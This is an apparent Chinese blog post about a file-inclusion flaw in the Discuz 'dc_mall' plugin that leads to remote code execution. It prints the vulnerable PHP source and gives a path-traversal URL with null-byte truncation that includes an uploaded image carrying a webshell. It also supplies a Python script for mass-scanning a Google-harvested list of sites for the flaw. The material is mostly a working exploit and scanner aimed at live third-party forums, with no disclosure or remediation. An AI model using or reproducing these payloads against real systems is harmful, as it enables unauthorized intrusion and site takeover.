IT博客汇
  • 首页
  • 精华
  • 技术
  • 设计
  • 资讯
  • 扯淡
  • 权利声明
    • 登录 注册

    discuz某插件设计缺陷可前台getshell

    没穿底裤发表于 2015-10-05 07:14:40
    love 0

    #插件信息:
    http://addon.discuz.com/?@dc_mall.plugin
    官方安装量3000+ (已经不少了吧)

    #测试环境:
    PHP 版本为: 5.2.9-2
    magic_quotes_gpc = off

    dc_mall.inc.php(漏洞文件)

    <?php

if(!defined('IN_DISCUZ')) {

	exit('Access Denied');

}

$_lang = lang('plugin/dc_mall');

$action = $_GET['action'] ? $_GET['action'] : 'index';

$version ='Ver 1.1.1';

$cvar = $_G['cache']['plugin']['dc_mall'];

$file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//action参数未过滤直接传入$file 后面的用%00截断即可包含任意文件



if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action');

$usercredit = getuserprofile('extcredits'.$cvar['credit']);

$mallnav = C::t('#dc_mall#dc_mall_sort')->getdata();

$sortid = dintval($_GET['sortid']);

if(empty($mallnav[$sortid]))$sortid=0;

@include $file;

$croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php';

$cronupdate = @include $croppath;

if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){

	require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php';

	build_cache_plugin_mallinfo();

	$configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";\n\n";

	if($fp = @fopen($croppath, 'wb')) {

		fwrite($fp, "<?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?>");

		fclose($fp);

	}

}

include template('dc_mall:index/'.$action);

?>

    #包含测试
    1
    #getshell
    怎么shell就不用多说了,前台上传带马图片,在直接用包含就成功
    www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall

    批量从谷歌采集了一批

    #!/usr/bin/env python  
# -*- coding: utf-8 -*-  
import urllib
import requests
import os
 

def exp():
    count=len(open('dz.txt','rU').readlines())
    for pwd in open("dz.txt").readlines():
        target=pwd.strip('\n')
        proto,rest = urllib.splittype(target)
        host,rest = urllib.splithost(rest)
        url = "http://"+host+"/plugin.php?action=../../../../../robots.txt%00&id=dc_mall"
        #print url
        try:
        	res = requests.get(url)
        	#print res.content
        	if "robots.txt" in res.content:
        		print host

        except Exception, e:
        	pass
               
if __name__ == '__main__':  
    exp()

    1



沪ICP备19023445号-2号
友情链接